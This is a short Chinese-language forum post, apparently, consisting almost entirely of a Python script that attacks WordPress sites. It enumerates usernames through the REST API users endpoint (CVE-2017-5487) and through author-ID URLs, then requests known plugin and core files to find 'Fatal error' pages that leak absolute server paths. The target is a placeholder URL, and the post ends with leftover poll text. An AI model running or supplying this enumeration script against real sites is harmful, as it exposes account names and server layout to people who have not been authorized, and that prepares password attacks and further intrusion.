包含读取用户 跟 基于CVE-2017-5487 正则匹配读取用户 WP配置不当常见文件的路径泄露
import re,requests
"""
默认读取前10个用户 (可自行修改)
如果是https 加上 verify=False
路径是绝对路径泄露
"""
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
}
url = "https://www.xxxxxxxx.com/"
def user():
urls = url + "/wp-json/wp/v2/users"
res = requests.get(url=urls,headers=headers)
res.encoding = "utf-8"
text = res.text
regular = re.compile(r'slug":"(.*?)"')
titles = re.findall(regular, text)
for i in titles:
print(i)
def user2():
for i in range(1, 20):
urls = url + "?author=" + str(i)
response = requests.get(url=urls, headers=headers)
response.encoding = "utf-8"
text = response.text
regular = re.compile(r'<body class="archive author author-(.*?) author')
titles = re.findall(regular, text)
for title in titles:
print(title)
def Route():
list1 = ['/wp-admin/includes/admin.php',
'/wp-content/plugins/akismet/akismet.php',
'/wp-content/plugins/akismet/hello.php',
'/wp-content/plugins/default/index.php',
'/wp-content/plugins/default/404.php',
'/wp-settings.php',
'/source/function/function_connect.php',
'wp-content/themes/b2/']
for i in list1:
urls = url + i
response = requests.get(url=urls, headers=headers)
response.encoding = "utf-8"
text = response.text
if "Fatal error" in text :
print(urls + "绝对路径泄露")
Route()
- 通过
- 未通过
0 投票者